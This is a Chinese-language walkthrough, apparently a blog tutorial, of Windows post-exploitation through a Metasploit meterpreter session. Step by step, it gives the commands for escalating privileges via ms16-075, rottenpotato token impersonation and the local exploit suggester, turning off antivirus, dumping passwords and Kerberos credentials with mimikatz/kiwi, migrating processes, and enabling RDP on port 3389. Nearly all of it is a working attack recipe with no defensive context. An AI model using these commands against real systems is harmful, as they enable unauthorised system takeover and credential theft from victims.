一、資訊收集
當我們的msf普通權限成功連接配接後,如圖:
shell進入指令行模式:
存在中文亂碼,<code>chcp 65001</code>将編碼格式改為utf-8:
将systeminfo資訊輸出到文檔info.txt:
exit退出目前終端。
下載下傳systeminfo資訊 download c:\\users\\root\\Desktop\\info1.txt /mnt/hgfs/share/info1.txt:
将syteminfo資訊通過工具篩選可能存在的提權漏洞。
如疑似存在漏洞ms16-075。将目前會話放置 背景background,檢視背景會話:
search ms16-075,搜尋漏洞利用子產品:
use 1,使用子產品,info檢視漏洞資訊
options檢視配置。最後run執行,發現執行出錯,網上找一些好的payload上傳
Getuid 檢視目前權限
Getsystem 自動化提升
先進入會話 sessions -i n
上傳本地惡意檔案到目标機器 ,盡量不要直接上傳到C槽根目錄會報錯。
list_tokens -u //列出目前存在的令牌
execute -cH -f C:/users/root/rottenpotato.exe 建立新程序
impersonate_token “NT AUTHORITY\\SYSTEM” //模仿windows system令牌,有時候一次不會成功,多試幾次
最終提權失敗。
使用子產品:<code>use multi/recon/local_exploit_suggester 來識别目前系統中可用的exp</code>
檢測出幾個可能利用的漏洞逐一嘗試。
提權成功後即為system權限。
到system權限後總思路為遠端,首先使用猕猴桃将密碼讀出,然後打開3389端口
首先關殺軟:
運作<code>load mimikatz</code>,版本msf6中,mimikatz被<code>kiwi子產品</code>合并了。
檢視kiwi的使用指南:<code>help kiwi</code>
三步走:列舉所有憑據:<code>creds_all</code>
列舉所有kerberos憑據:<code>creds_kerberos</code>
調用kiwi_cmd執行mimikatz指令:<code>kiwi_cmd sekurlsa::logonpasswords</code>
Kiwi的使用,發現執行指令沒有結果或報錯。
<code>ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process</code>。這是因為你上傳的是X86的嗎,需要遷移程序到x64的
使用指令:getuid檢視目前程序号
然後ps檢視所有程序,找到适合遷移的程序,且為system權限。
使用指令:migrate 7240遷移程序到其他id
最後的打開3389端口:run post/windows/manage/enable_rdp